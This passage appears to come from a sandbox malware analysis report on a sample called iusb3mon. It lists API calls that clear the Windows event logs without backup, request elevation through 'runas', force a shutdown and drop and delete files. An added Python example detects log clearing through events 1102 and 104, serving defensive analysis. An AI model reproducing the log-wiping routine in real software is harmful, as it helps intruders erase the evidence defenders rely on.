                                                                                                                    • OpenEventLogA.ADVAPI32(00000000,06267C38), ref: 06243B93
                                                                                                                    • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 06243BA2
                                                                                                                    • CloseEventLog.ADVAPI32(00000000), ref: 06243BA9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Event$ClearCloseOpen
                                                                                                                    • String ID: Application$Security$System
                                                                                                                    • API String ID: 1391105993-2169399579
                                                                                                                    • Opcode ID: acdb5db869df3fd690516aae1e5c613de7905647795eb4bb1c53f8963a82d760
                                                                                                                    • Instruction ID: 8922fbff29a079a6a1f25d88335e0650558795d0139f015fef1f7774908cdfd4
                                                                                                                    • Opcode Fuzzy Hash: acdb5db869df3fd690516aae1e5c613de7905647795eb4bb1c53f8963a82d760
                                                                                                                    • Instruction Fuzzy Hash: CC01B570D35A0DAFDBA4EF5AA848BEC7BB0EB04395F504095E901FA240E6344740CFA0
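The function above opens the Application, Security and System logs in turn, clears each with ClearEventLogA and a NULL backup path, so no copy is kept, and closes the handle. Windows records the clear itself after it happens: event 1102 in the Security log and event 104 in the System log (naming the cleared channel), both from the Microsoft-Windows-Eventlog provider. The Python below is an added detection example, not part of the report or of the sample: it parses event XML and emits one alert per cleared log plus a higher-severity alert when several channels are wiped inside a short window, which is exactly the sweep this function produces. The event records are constructed for the example and reduced to the fields the logic reads; the timestamps, computer name and user are invented.

```python
"""Added detection example: the event records Windows writes after an event log is cleared."""
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event",
      "l": "http://manifests.microsoft.com/win/2004/08/windows/eventlog"}


def _event_xml(event_id, channel, when, provider="Microsoft-Windows-Eventlog", user_data=""):
    """Build a minimal Windows event XML record (constructed sample data, not from the sandbox run)."""
    return (f'<Event xmlns="{NS["e"]}"><System><Provider Name="{provider}"/>'
            f'<EventID>{event_id}</EventID><TimeCreated SystemTime="{when}"/>'
            f'<Channel>{channel}</Channel><Computer>WS01</Computer></System>{user_data}</Event>')


def _cleared(cleared_channel=None, user="user"):
    """UserData/LogFileCleared body: 104 names the wiped channel, 1102 (Security) does not."""
    chan = f"<Channel>{cleared_channel}</Channel>" if cleared_channel else ""
    return (f'<UserData><LogFileCleared xmlns="{NS["l"]}"><SubjectUserName>{user}</SubjectUserName>'
            f"<SubjectDomainName>WS01</SubjectDomainName>{chan}<BackupPath></BackupPath>"
            f"</LogFileCleared></UserData>")


# Constructed sample: one benign logon, then the three back-to-back clears the function above performs.
SAMPLE_EVENTS = [
    _event_xml(4624, "Security", "2024-12-31T09:59:50Z", provider="Microsoft-Windows-Security-Auditing"),
    _event_xml(104, "System", "2024-12-31T10:00:00Z", user_data=_cleared("Application")),
    _event_xml(1102, "Security", "2024-12-31T10:00:01Z", user_data=_cleared()),
    _event_xml(104, "System", "2024-12-31T10:00:02Z", user_data=_cleared("System")),
]


def parse_event(xml_text: str) -> dict:
    """Pull provider, id, channel, time and the LogFileCleared fields out of one event."""
    root = ET.fromstring(xml_text)
    sys_ = root.find("e:System", NS)
    rec = {"provider": sys_.find("e:Provider", NS).get("Name"),
           "event_id": int(sys_.find("e:EventID", NS).text),
           "channel": sys_.find("e:Channel", NS).text,
           "time": datetime.fromisoformat(
               sys_.find("e:TimeCreated", NS).get("SystemTime").replace("Z", "+00:00"))}
    cleared = root.find("e:UserData/l:LogFileCleared", NS)
    if cleared is not None:
        rec["subject"] = cleared.findtext("l:SubjectUserName", default="", namespaces=NS)
        # 1102 carries no Channel element: the cleared log is the Security log itself.
        rec["cleared_channel"] = cleared.findtext("l:Channel", default=rec["channel"], namespaces=NS)
        rec["backup_path"] = cleared.findtext("l:BackupPath", default="", namespaces=NS)
    return rec


def is_log_clear(rec: dict) -> bool:
    """1102 (Security) and 104 (System), both from Microsoft-Windows-Eventlog, are written
    after the clear completes, so ClearEventLogA leaves this trace even with no backup."""
    return rec["provider"] == "Microsoft-Windows-Eventlog" and (
        (rec["event_id"] == 1102 and rec["channel"] == "Security")
        or (rec["event_id"] == 104 and rec["channel"] == "System"))


def detect(xml_records, window=timedelta(seconds=10)) -> list:
    """One medium alert per cleared log, plus one high alert if distinct channels are
    wiped within `window` (the Application/Security/System sweep seen above)."""
    clears = sorted((r for r in map(parse_event, xml_records) if is_log_clear(r)),
                    key=lambda r: r["time"])
    alerts = [{"rule": "event_log_cleared", "severity": "medium", "channel": r["cleared_channel"],
               "subject": r["subject"], "no_backup": r["backup_path"] == ""} for r in clears]
    for i, first in enumerate(clears):
        burst = [r for r in clears[i:] if r["time"] - first["time"] <= window]
        channels = sorted({r["cleared_channel"] for r in burst})
        if len(channels) >= 2:
            alerts.append({"rule": "mass_event_log_clear", "severity": "high", "channels": channels,
                           "start": first["time"].isoformat(), "count": len(burst)})
            break
    return alerts
```

Clearing the Security log requires SeSecurityPrivilege, so a 1102 attributed to this sample also tells you it ran with administrative rights. The Application and System clears appear as 104 in the System log with an empty BackupPath, matching the NULL second argument to ClearEventLogA above. The burst rule fires once per sweep rather than once per event so that a single action does not produce three high-severity alerts.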
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,001EA660,?,00000000), ref: 001EA3DB
                                                                                                                    • GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,001EA660,?,00000000), ref: 001EA404
                                                                                                                    • GetACP.KERNEL32(?,?,001EA660,?,00000000), ref: 001EA419
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale
                                                                                                                    • String ID: ACP$OCP
                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                    • Opcode ID: 339e03542f57714a1d34b5cc6ce93c04afaae7b64395bb032138516833f176d0
                                                                                                                    • Instruction ID: 12d83c4f6769c4e4675bba40c09a6b0138af8f08c87c75ef476bb2e06be9c32d
                                                                                                                    • Opcode Fuzzy Hash: 339e03542f57714a1d34b5cc6ce93c04afaae7b64395bb032138516833f176d0
                                                                                                                    • Instruction Fuzzy Hash: 1B21C132B00980A6DB388F57C904A9FB3E6BF54B55B9A8474EA0AD7144E772FD81C352
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 06244681
                                                                                                                      • Part of subcall function 0624461E: GetVersionExA.KERNEL32(?), ref: 06244638
                                                                                                                    • ShellExecuteExA.SHELL32(0000003C), ref: 062446F2
                                                                                                                    • ExitProcess.KERNEL32 ref: 062446FE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecuteExitFileModuleNameProcessShellVersion
                                                                                                                    • String ID: <$runas
                                                                                                                    • API String ID: 984616556-1187129395
                                                                                                                    • Opcode ID: 030fb05df5d50a574afea9a8b842895ee53fb0aac2525b3d87986feff66b6aad
                                                                                                                    • Instruction ID: c303a2e9567f552b32e5a35a787a8cbe68f90d5b8ab7db437d0ce91af289b07a
                                                                                                                    • Opcode Fuzzy Hash: 030fb05df5d50a574afea9a8b842895ee53fb0aac2525b3d87986feff66b6aad
                                                                                                                    • Instruction Fuzzy Hash: 54114F72D14359AAEF65EBA5EC09BC9BBF5BB08304F0044A5E708F6190DB709688CF14
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 062491B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
                                                                                                                      • Part of subcall function 062491B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0624732E
                                                                                                                    • wsprintfA.USER32 ref: 06247343
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$FreeInfoLoadSystemwsprintf
                                                                                                                    • String ID: %d*%sMHz$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                                                                                    • API String ID: 3469679427-2169120903
                                                                                                                    • Opcode ID: b06cdd400b3a2182089cb28a58f1a0d0952cd26226a554c517a6dd08bceb4d04
                                                                                                                    • Instruction ID: 5bc8939486792669b8af9c461bf1a24643b784a2ad54a99be3d25a2a6b9ce6bf
                                                                                                                    • Opcode Fuzzy Hash: b06cdd400b3a2182089cb28a58f1a0d0952cd26226a554c517a6dd08bceb4d04
                                                                                                                    • Instruction Fuzzy Hash: 1DF0E276D20208BFEF04EBE8DC4AEAEBB3D9B08200F004014FF20F2041E67096508B65
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 001E0B40: GetLastError.KERNEL32(?,00000008,001E49F0), ref: 001E0B44
                                                                                                                      • Part of subcall function 001E0B40: SetLastError.KERNEL32(00000000,?,00000006,000000FF), ref: 001E0BE6
                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 001EA623
                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 001EA66C
                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 001EA67B
                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 001EA6C3
                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 001EA6E2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 415426439-0
                                                                                                                    • Opcode ID: 1e911b659cca603db4d3f9874705adb5e052ed16914eaa5c066258c746e1681e
                                                                                                                    • Instruction ID: 945255be63a420b0dcbc1a16e6c88e24e73a4fcb50fdbf2c495a6d1bafe91ee2
                                                                                                                    • Opcode Fuzzy Hash: 1e911b659cca603db4d3f9874705adb5e052ed16914eaa5c066258c746e1681e
                                                                                                                    • Instruction Fuzzy Hash: 3251B471A00A85AFDB10DFA6CC41ABEB7B8BF19700F494469F905EB190E770E944CB62
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 001E0B40: GetLastError.KERNEL32(?,00000008,001E49F0), ref: 001E0B44
                                                                                                                      • Part of subcall function 001E0B40: SetLastError.KERNEL32(00000000,?,00000006,000000FF), ref: 001E0BE6
                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,001DE45B,?,?,?,?,?,-00000050,?,?,?), ref: 001E9C74
                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001DE45B,?,?,?,?,?,-00000050,?,?), ref: 001E9C9F
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 001E9E02
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
Similarity
• API ID: ErrorLast$CodeInfoLocalePageValid
• String ID: utf8
APIs
  • Part of subcall function 0625B4CB: GetWindowLongA.USER32(?,000000F0), ref: 0625B4D7
• GetKeyState.USER32(00000010), ref: 0625AC13
• GetKeyState.USER32(00000011), ref: 0625AC1C
• GetKeyState.USER32(00000012), ref: 0625AC25
• SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0625AC3B
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Similarity
• API ID: State$LongMessageSendWindow
• String ID:
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,001D6460,001EF12C), ref: 001D6345
• UnhandledExceptionFilter.KERNEL32(?,?,001D6460,001EF12C), ref: 001D634E
• GetCurrentProcess.KERNEL32(C0000409,?,001D6460,001EF12C), ref: 001D6359
• TerminateProcess.KERNEL32(00000000,?,001D6460,001EF12C), ref: 001D6360
Memory Dump Source
• Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
• String ID:
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
APIs
  • Part of subcall function 06248FF7: LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,062439FA,SeShutdownPrivilege,00000001,?,0624200F,?), ref: 0624900F
  • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0624901F
  • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0624902A
  • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 06249035
  • Part of subcall function 06248FF7: LoadLibraryA.KERNEL32(kernel32.dll,?,062439FA,SeShutdownPrivilege,00000001,?,0624200F,?), ref: 0624903F
  • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 0624904A
  • Part of subcall function 06248FF7: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06249092
  • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0624909A
  • Part of subcall function 06248FF7: CloseHandle.KERNEL32(?), ref: 062490A9
  • Part of subcall function 06248FF7: FreeLibrary.KERNEL32(00000000), ref: 062490BA
  • Part of subcall function 06248FF7: FreeLibrary.KERNEL32(00000000), ref: 062490C5
• ExitWindowsEx.USER32(?,00000000), ref: 06243A02
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Similarity
• API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
• String ID: SeShutdownPrivilege
Memory Dump Source
• Source File: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_4d10000_iusb3mon.jbxd
Similarity
• API ID:
• String ID: l$ntdl
Memory Dump Source
• Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4752ed74c6e0d5fc0635c5e9ee1919fb5ee4d4faf056dc546268fc3d4a948d2d
• Instruction ID: b958b88a9727af30eee3be6302b5e940da44b9f56b738f9988b426b64e09ae14
• Opcode Fuzzy Hash: 4752ed74c6e0d5fc0635c5e9ee1919fb5ee4d4faf056dc546268fc3d4a948d2d
• Instruction Fuzzy Hash: CAE046329116A8EBCB14DB99C904D8AF2ECEB44B41B110096B505E3210C670DE01C7D0
Memory Dump Source
• Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 694cbe831bc19fd0730d4c407680a11a69efbe1f69b7222d89b60d0701cb05dc
• Instruction ID: 6549d09c47c5f1f1523cabb2a3d3eae127fa4d7ed8b0d4a4eeada5144e59da21
• Opcode Fuzzy Hash: 694cbe831bc19fd0730d4c407680a11a69efbe1f69b7222d89b60d0701cb05dc
• Instruction Fuzzy Hash: 3DC08C74040D408ACE299A10D2F13A83354A3A3786FC0068EC8070B746CF1EAC83EF00
APIs
  • Part of subcall function 06242A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06242661,c:\inst.ini), ref: 06242A2B
  • Part of subcall function 06242A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06242661,c:\inst.ini), ref: 06242A40
  • Part of subcall function 06242A15: CloseHandle.KERNEL32(00000000,?,06242661,c:\inst.ini), ref: 06242A4D
  • Part of subcall function 06241C74: SetFileAttributesA.KERNEL32(00000000,00000080,0624682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06241C88
• Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 062427B0
• DeleteFileA.KERNEL32(C:\ProgramData\upx.rar,?,?,00000000,?,?), ref: 062427B9
• DeleteFileA.KERNEL32(C:\ProgramData\Data\upx.rar,?,?,00000000,?,?), ref: 062427BC
• Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 062427C3
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000,?,?), ref: 062427D3
• LoadLibraryA.KERNEL32(0000004B,?,?,?,00000000,?,?), ref: 06242849
• GetProcAddress.KERNEL32(00000000), ref: 06242850
• GetTickCount.KERNEL32 ref: 0624289E
• GetTickCount.KERNEL32 ref: 062428D9
